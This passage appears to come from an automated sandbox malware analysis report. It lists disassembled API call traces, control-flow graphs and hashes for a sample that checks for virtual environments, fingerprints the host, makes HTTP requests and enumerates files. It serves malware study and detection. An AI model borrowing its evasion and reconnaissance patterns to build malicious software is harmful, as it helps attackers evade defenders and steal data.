                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET
                                    • API String ID: 3687753495-3591763792
                                    • Opcode ID: 25ec9f40320d3f8487f34b2efcb769096b7c253edc0f909e21110065afdc3a64
                                    • Instruction ID: 15258aa9d7bf00b46c05e63486b52780bc82535cc76012ece1f57920fcc2e88d
                                    • Opcode Fuzzy Hash: 25ec9f40320d3f8487f34b2efcb769096b7c253edc0f909e21110065afdc3a64
                                    • Instruction Fuzzy Hash: B581B071E01619ABEB20DFA4DC49FEE77B8EF44710F144068F925EB280DB74AD449BA4
                                    APIs
                                    • lstrlen.KERNEL32(00A85B10), ref: 00F7F315
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F3A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F3C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F47B
                                    • lstrcpy.KERNEL32(00000000,00A85B10), ref: 00F7F4BB
                                    • lstrcpy.KERNEL32(00000000,00A98F18), ref: 00F7F4EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F59E
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F7F61C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F64C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F69A
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7F718
                                    • lstrlen.KERNEL32(00A98FE8), ref: 00F7F746
                                    • lstrcpy.KERNEL32(00000000,00A98FE8), ref: 00F7F771
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F793
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F7E4
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7FA32
                                    • lstrlen.KERNEL32(00A98FA8), ref: 00F7FA60
                                    • lstrcpy.KERNEL32(00000000,00A98FA8), ref: 00F7FA8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7FAAD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7FAFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: 5319c622088c8ac5f0a67395a5cfc3703ff15a8021471f8637b45ae4fa2609de
                                    • Instruction ID: 9702d9054104e335fe6535da42a7f921ff031883fe89f44c20de2d0a5f390eda
                                    • Opcode Fuzzy Hash: 5319c622088c8ac5f0a67395a5cfc3703ff15a8021471f8637b45ae4fa2609de
                                    • Instruction Fuzzy Hash: 0CF13A70E01205CFDB68CF69C484A29B7E5BF48324B18C0BED82D9B255E735DC86EB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2721 f78ca0-f78cc4 StrCmpCA 2722 f78cc6-f78cc7 ExitProcess 2721->2722 2723 f78ccd-f78ce6 2721->2723 2725 f78ee2-f78eef call f62a20 2723->2725 2726 f78cec-f78cf1 2723->2726 2728 f78cf6-f78cf9 2726->2728 2729 f78ec3-f78edc 2728->2729 2730 f78cff 2728->2730 2729->2725 2764 f78cf3 2729->2764 2732 f78e56-f78e64 StrCmpCA 2730->2732 2733 f78d30-f78d3f lstrlen 2730->2733 2734 f78dbd-f78dcb StrCmpCA 2730->2734 2735 f78ddd-f78deb StrCmpCA 2730->2735 2736 f78dfd-f78e0b StrCmpCA 2730->2736 2737 f78e1d-f78e2b StrCmpCA 2730->2737 2738 f78e3d-f78e4b StrCmpCA 2730->2738 2739 f78d5a-f78d69 lstrlen 2730->2739 2740 f78d06-f78d15 lstrlen 2730->2740 2741 f78d84-f78d92 StrCmpCA 2730->2741 2742 f78da4-f78db8 StrCmpCA 2730->2742 2743 f78e6f-f78e7d StrCmpCA 2730->2743 2744 f78e88-f78e9a lstrlen 2730->2744 2732->2729 2756 f78e66-f78e6d 2732->2756 2760 f78d41-f78d46 call f62a20 2733->2760 2761 f78d49-f78d55 call f62930 2733->2761 2734->2729 2749 f78dd1-f78dd8 2734->2749 2735->2729 2750 f78df1-f78df8 2735->2750 2736->2729 2751 f78e11-f78e18 2736->2751 2737->2729 2752 f78e31-f78e38 2737->2752 2738->2729 2753 f78e4d-f78e54 2738->2753 2745 f78d73-f78d7f call f62930 2739->2745 2746 f78d6b-f78d70 call f62a20 2739->2746 2754 f78d17-f78d1c call f62a20 2740->2754 2755 f78d1f-f78d2b call f62930 2740->2755 2741->2729 2748 f78d98-f78d9f 2741->2748 2742->2729 2743->2729 2757 f78e7f-f78e86 2743->2757 2758 f78ea4-f78eb0 call f62930 2744->2758 2759 f78e9c-f78ea1 call f62a20 2744->2759 2779 f78eb3-f78eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2729 2754->2755 2755->2779 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 f78eb7-f78eb9 2779->2780 2780->2729 2781 f78ebb-f78ebd lstrcpy 2780->2781 2781->2729
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 68258f3cdae9a89ea9b11f9de9b4d8ae83dbbc40298db1976d07491841ef591c
                                    • Instruction ID: 859cb5a2bdb0411765e38b5ed5e5cf5762a1740e5f52975a811cfc2daef72c0e
                                    • Opcode Fuzzy Hash: 68258f3cdae9a89ea9b11f9de9b4d8ae83dbbc40298db1976d07491841ef591c
                                    • Instruction Fuzzy Hash: EC519371D44705DFDB209FB5D988E2B7BF8BB54744B10882EE566C2600DB78E443BB22

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2782 f82740-f82783 GetWindowsDirectoryA 2783 f8278c-f827ea GetVolumeInformationA 2782->2783 2784 f82785 2782->2784 2785 f827ec-f827f2 2783->2785 2784->2783 2786 f82809-f82820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 f827f4-f82807 2785->2787 2788 f82822-f82824 2786->2788 2789 f82826-f82844 wsprintfA 2786->2789 2787->2785 2790 f8285b-f82872 call f871e0 2788->2790 2789->2790
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00F8277B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00F793B6,00000000,00000000,00000000,00000000), ref: 00F827AC
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F8280F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82816
                                    • wsprintfA.USER32 ref: 00F8283B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 73ea2146eef0a21b91bd5503ed49fa1eda4107a2ed2f6e3ba07418038b49d338
                                    • Instruction ID: f680e3507e5e8f3926dbc18843fbb1c4b60a456917c400a1bf5826fe3aaa3262
                                    • Opcode Fuzzy Hash: 73ea2146eef0a21b91bd5503ed49fa1eda4107a2ed2f6e3ba07418038b49d338
                                    • Instruction Fuzzy Hash: ED3172B2D042099FCB14DFB98985AEFBFBCEF59710F10016AE515F7644E2349A408BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2793 f64bc0-f64bce 2794 f64bd0-f64bd5 2793->2794 2794->2794 2795 f64bd7-f64c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call f62a20 2794->2795
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00F64BF7
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F64C01
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F64C0B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 00F64C1F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 00F64C27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: a3b878ebe56e665116151d89abdb7bfdbf925aab8d08c69ec5f704329f0dd18e
                                    • Instruction ID: 2ae52f23f78619486431dedf59953bab29bb0b337c05149e58436cebd68ed0d5
                                    • Opcode Fuzzy Hash: a3b878ebe56e665116151d89abdb7bfdbf925aab8d08c69ec5f704329f0dd18e
                                    • Instruction Fuzzy Hash: 0E014071D00218AFDB14DFA8EC45B9EBBB8EB49320F004126F924E7390EB7459048FD5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2798 f61030-f61055 GetCurrentProcess VirtualAllocExNuma 2799 f61057-f61058 ExitProcess 2798->2799 2800 f6105e-f6107b VirtualAlloc 2798->2800 2801 f61082-f61088 2800->2801 2802 f6107d-f61080 2800->2802 2803 f610b1-f610b6 2801->2803 2804 f6108a-f610ab VirtualFree 2801->2804 2802->2801 2804->2803
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F61046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F6104D
                                    • ExitProcess.KERNEL32 ref: 00F61058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F6106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00F610AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: d23e4fb6c38e4fdb58a11412c86dc8706b11ed99e42c114009a25e80f2f845ac
                                    • Instruction ID: 3dfaa852bc1967dc0f670f018bd186d18d36143bbccc4eaae87a7c7fd351235b
                                    • Opcode Fuzzy Hash: d23e4fb6c38e4fdb58a11412c86dc8706b11ed99e42c114009a25e80f2f845ac
                                    • Instruction Fuzzy Hash: C901F4B17403087BEB384A756C5AF6B77ADB785B15F248028F724E72C0D9B2E9409664

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2805 f7ee90-f7eeb5 call f62930 2808 f7eeb7-f7eebf 2805->2808 2809 f7eec9-f7eecd call f66c40 2805->2809 2808->2809 2810 f7eec1-f7eec3 lstrcpy 2808->2810 2812 f7eed2-f7eee8 StrCmpCA 2809->2812 2810->2809 2813 f7ef11-f7ef18 call f62a20 2812->2813 2814 f7eeea-f7ef02 call f62a20 call f62930 2812->2814 2820 f7ef20-f7ef28 2813->2820 2823 f7ef45-f7efa0 call f62a20 * 10 2814->2823 2824 f7ef04-f7ef0c 2814->2824 2820->2820 2822 f7ef2a-f7ef37 call f62930 2820->2822 2822->2823 2831 f7ef39 2822->2831 2824->2823 2827 f7ef0e-f7ef0f 2824->2827 2830 f7ef3e-f7ef3f lstrcpy 2827->2830 2830->2823 2831->2830
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EEC3
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7EEDE
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7EF3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: e728f5608837c06a1629c60b7e2c67fa9cee3feb11b44b997d1524a33766d5e2
                                    • Instruction ID: 525f9847481c18d172969d30e997be4fccb81eb0c717dda29da2a2367392b803
                                    • Opcode Fuzzy Hash: e728f5608837c06a1629c60b7e2c67fa9cee3feb11b44b997d1524a33766d5e2
                                    • Instruction Fuzzy Hash: 0D217130A216059BCB61FFB8DD56A9E37A4AF14304F088469F85ACB602DB7CEC00B791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2886 f610c0-f610cb 2887 f610d0-f610dc 2886->2887 2889 f610de-f610f3 GlobalMemoryStatusEx 2887->2889 2890 f610f5-f61106 2889->2890 2891 f61112-f61114 ExitProcess 2889->2891 2892 f6111a-f6111d 2890->2892 2893 f61108 2890->2893 2893->2891 2894 f6110a-f61110 2893->2894 2894->2891 2894->2892
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 0af822dec8986b3841515488a1175ed69c7a71417f84196ea66a8d9d3ce6e341
                                    • Instruction ID: f30d9152dfb2305c053f1a236b741c8201a730669e2da9f7b2abd7d359cb6700
                                    • Opcode Fuzzy Hash: 0af822dec8986b3841515488a1175ed69c7a71417f84196ea66a8d9d3ce6e341
                                    • Instruction Fuzzy Hash: 35F082B09182485BFB246A64984B729F7DCFB02364F184A29DEAAC2191E670C840A267

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2895 f78c88-f78cc4 StrCmpCA 2897 f78cc6-f78cc7 ExitProcess 2895->2897 2898 f78ccd-f78ce6 2895->2898 2900 f78ee2-f78eef call f62a20 2898->2900 2901 f78cec-f78cf1 2898->2901 2903 f78cf6-f78cf9 2901->2903 2904 f78ec3-f78edc 2903->2904 2905 f78cff 2903->2905 2904->2900 2939 f78cf3 2904->2939 2907 f78e56-f78e64 StrCmpCA 2905->2907 2908 f78d30-f78d3f lstrlen 2905->2908 2909 f78dbd-f78dcb StrCmpCA 2905->2909 2910 f78ddd-f78deb StrCmpCA 2905->2910 2911 f78dfd-f78e0b StrCmpCA 2905->2911 2912 f78e1d-f78e2b StrCmpCA 2905->2912 2913 f78e3d-f78e4b StrCmpCA 2905->2913 2914 f78d5a-f78d69 lstrlen 2905->2914 2915 f78d06-f78d15 lstrlen 2905->2915 2916 f78d84-f78d92 StrCmpCA 2905->2916 2917 f78da4-f78db8 StrCmpCA 2905->2917 2918 f78e6f-f78e7d StrCmpCA 2905->2918 2919 f78e88-f78e9a lstrlen 2905->2919 2907->2904 2931 f78e66-f78e6d 2907->2931 2935 f78d41-f78d46 call f62a20 2908->2935 2936 f78d49-f78d55 call f62930 2908->2936 2909->2904 2924 f78dd1-f78dd8 2909->2924 2910->2904 2925 f78df1-f78df8 2910->2925 2911->2904 2926 f78e11-f78e18 2911->2926 2912->2904 2927 f78e31-f78e38 2912->2927 2913->2904 2928 f78e4d-f78e54 2913->2928 2920 f78d73-f78d7f call f62930 2914->2920 2921 f78d6b-f78d70 call f62a20 2914->2921 2929 f78d17-f78d1c call f62a20 2915->2929 2930 f78d1f-f78d2b call f62930 2915->2930 2916->2904 2923 f78d98-f78d9f 2916->2923 2917->2904 2918->2904 2932 f78e7f-f78e86 2918->2932 2933 f78ea4-f78eb0 call f62930 2919->2933 2934 f78e9c-f78ea1 call f62a20 2919->2934 2954 f78eb3-f78eb5 2920->2954 2921->2920 2923->2904 2924->2904 2925->2904 2926->2904 2927->2904 2928->2904 2929->2930 2930->2954 2931->2904 2932->2904 2933->2954 2934->2933 2935->2936 2936->2954 2939->2903 2954->2904 2955 f78eb7-f78eb9 2954->2955 2955->2904 2956 f78ebb-f78ebd lstrcpy 2955->2956 2956->2904
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3179570e506e0fc87b80f251f9b4f99531a16d2a6c0cc07b604fe68705ac4ef2
                                    • Instruction ID: 68fbca5cc96f1655dff82f539b816a8c92cdb662603d79ff5dec740ede065090
                                    • Opcode Fuzzy Hash: 3179570e506e0fc87b80f251f9b4f99531a16d2a6c0cc07b604fe68705ac4ef2
                                    • Instruction Fuzzy Hash: 66E0C026904348BBCB3457B88C7CCC77FACCF40204B060069FA685BA00D430DC01C3A6
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F723D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F723F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72402
                                    • lstrlen.KERNEL32(\*.*), ref: 00F7240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F72436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F72486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 95399509001528181cd7f351beab1ae4b1f98fdfd7a75e683f91d3668874ee6a
                                    • Instruction ID: a29d3737b7a8158d0f2aa230909007ea25881eafb17074a1aceeb4de4fa02f10
                                    • Opcode Fuzzy Hash: 95399509001528181cd7f351beab1ae4b1f98fdfd7a75e683f91d3668874ee6a
                                    • Instruction Fuzzy Hash: 21A2C671D0161A9BDB71AFB4CD89AAE77B8BF44314F088039F829D7205DB38DD41AB52
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F616E2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6176C
                                    • lstrcat.KERNEL32(00000000), ref: 00F61776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F617F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61825
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61875
                                    • lstrcat.KERNEL32(00000000), ref: 00F6187F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F618AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F618F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F618FE
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61909
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61929
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61935
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6195B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61966
                                    • lstrlen.KERNEL32(\*.*), ref: 00F61971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6198E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F6199A
                                      • Part of subcall function 00F84040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00F8406D
                                      • Part of subcall function 00F84040: lstrcpy.KERNEL32(00000000,?), ref: 00F840A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F619C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61A0E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61A16
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61A21
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61A41
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61A4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61A76
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61A81
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61AAC
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61AB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61ADE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61AE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61B11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F61B45
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F61B70
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F61B8A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61BC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61BFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61C03
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61C0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61C31
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61C69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61C74
